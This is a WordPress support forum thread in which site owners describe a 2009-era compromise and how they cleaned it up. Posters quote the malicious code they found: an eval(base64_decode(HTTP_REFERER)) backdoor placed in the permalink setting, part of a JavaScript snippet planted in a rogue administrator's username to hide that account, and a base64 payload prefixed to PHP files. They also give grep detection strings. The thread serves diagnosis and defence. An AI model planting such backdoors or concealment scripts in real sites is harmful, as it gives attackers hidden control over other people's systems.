[resolved] eval(base64_decode(...)) in permalinks (13 posts)

  1. benanne
    Posted 6 years ago #

    I figure my blog got hacked. It's my own fault for being too lazy to upgrade, but I thought I'd describe the symptoms, so other people who have the same problem have something to go by. I have since removed all the malicious stuff (at least I think I have) and upgraded to version 2.8.4.

    Since this morning, I noticed that my "permalinks" setting had been customised (I use the default ?p=123-style URLs, normally) and for some reason, there was something like: ${eval(base64_decode($_SERVER[HTTP_REFERER]))} appended to each of them. Which caused them not to work, obviously.

    When I looked at my users list, I noticed something odd: at the top it said Administrators (2), but only my own account was listed as administrator. I took a look at the database and seemingly, a user called "JohnFisher76" also had admin rights. I'd had a few spam registrations before so I hadn't paid attention to this. I wish I had...

    This user's username was... a bit weird. It looked like this:

    <div id="user_superuser"><script language="JavaScript">
    var setUserName = function(){
    		var t=document.getElementById("user_superuser");
    		var tags = document.getElementsByTagName("H3");
    		var s = " shown below";
    		for (var i = 0; i < tags.length; i++) {
    			var t=tags[i].innerHTML;
    			var h=tags[i];
    				s =(parseInt(t)-1)+s;
    				t = document.createTextNode(s);
    		var arr=document.getElementsByTagName("ul");
    		for(var i in arr) if(arr[i].className=="subsubsub"){
    			var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
    				var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");

    I haven't bothered to try and interpret what this does, but I guess it's used to hide the fact that there is another administrator in the admin panel. I don't know how this user managed to acquire admin rights though.

    Anyway, shame on me for not upgrading. To fix it, I removed the user (manually, in the database, tables user and usermeta), got rid of the funky permalink stuff, and then upgraded to 2.8.4 as fast as I could. As far as I can tell that's fixed it. I hope this thing hasn't left anything else behind that could come back to haunt me...

  2. riis
    Posted 6 years ago #


    I've experienced the same thing today. I visited my site yesterday and everything was fine. Today everything is messed up. How did you get rid of the permalink problems?


  3. benanne
    Posted 6 years ago #

    I just set it back to the default setting. Technically, I did remove the appended stuff in the database manually before that, but I don't think that had any effect.

    At any rate it can't hurt to search the "options" table for any reference to "eval" or "base64" and clean that up. It also appeared in a row in "options" called "rewrite_rules", I think. But that disappeared once I changed the setting back.

    As I said, I don't know if this has caused any other damage. The changed permalink setting rather seems like it is put in place to make further hacks easier to apply, although I have no idea how.

  4. lexthoonen
    Posted 6 years ago #

    Check this thread:

    and upgrade wordpress

  5. benanne
    Posted 6 years ago #

    Thanks, that is indeed exactly the same problem as the one I had. Maybe the extra information about the rogue user with administrator rights is still interesting, though.

  6. jekket
    Posted 6 years ago #

    i`ve just clean this stuff in "permalinks" and change my admin password.

    all works.

    P.S. Do backups - it saves your time

  7. benanne
    Posted 6 years ago #

    If I were you, I would check my user list to see if there are any admins in there that shouldn't be there...

  8. Roy
    Posted 6 years ago #

    Thread number three

    It seems that this already started a couple of weeks ago, judging the oldest thread. Some automatic attack I guess.

  9. chabotjeff
    Posted 6 years ago #

    My site got nailed too. I didn't think of anything when I had a couple "admin" users added to the site. Thought it was just spam. But I had two additional "admins" with "contributer" status and they were able to change the Permalinks url structure. Argghh.

  10. Emilian Robert Vicol
    Posted 6 years ago #

    problem solved ... http://blog.4rev.net/2009-09/wordpress-hacked-eval-base64_decode-_serverhttp_referer/

    in wp_options table, clear the row named _transient_rewrite_rules and set permailink from wp config again !!!

    check all your dababase for infection:

    from ssh , use grep and search for particular strings in all database from server :

    grep -H -r “eval(base64_decode” /var/lib/mysql
        grep -H -r “var setUserName = function” /var/lib/mysql

    have a nice day ...

  11. jremillard
    Posted 6 years ago #

    Well, happy? to say that its not your fault!

    the hacks are coming from lower layers than WP itself, we suspect the the OS's themselves are cracked.

    frankly, the only 'real' way to monitor and know if you have been hacked would be to monitor for malware, which we offer for free at: http://www.sitesecuritymonitor.com

    We also offer a free WP security plugin, to lockdown all versions of wordpress. This works in 98% of the cases (download here: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ ) - however in this case, if you are hosted w/ godaddy, since the attacks are from the inside (we suspect in this case a cracked apache.conf that is injecting malware during execution) - the plugin wouldn't help much


  12. 3stripe
    Posted 6 years ago #

    I have a similar problem on Dreamhost, all of my WP files have been injected with this at the start:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25f.... etc

    @jremillard, do you think I'm being hacked via WordPress, or some other way?

    So sick of this happening :(


  13. James Huff
    Support Team Rep.
    Posted 6 years ago #

    The current hack involves injecting base64 code into all .php files, not just WordPress. I believe the leading theory at this point is that malware is exploiting passwords that are sent "in the clear" via FTP clients. The solution in that case would be to switch to using SFTP. Use FileZilla if you're on a PC or Cyberduck if you're on a Mac.

    To clean out the current hack, carefully follow this guide:


Topic Closed

This topic has been closed to new replies.

About this Topic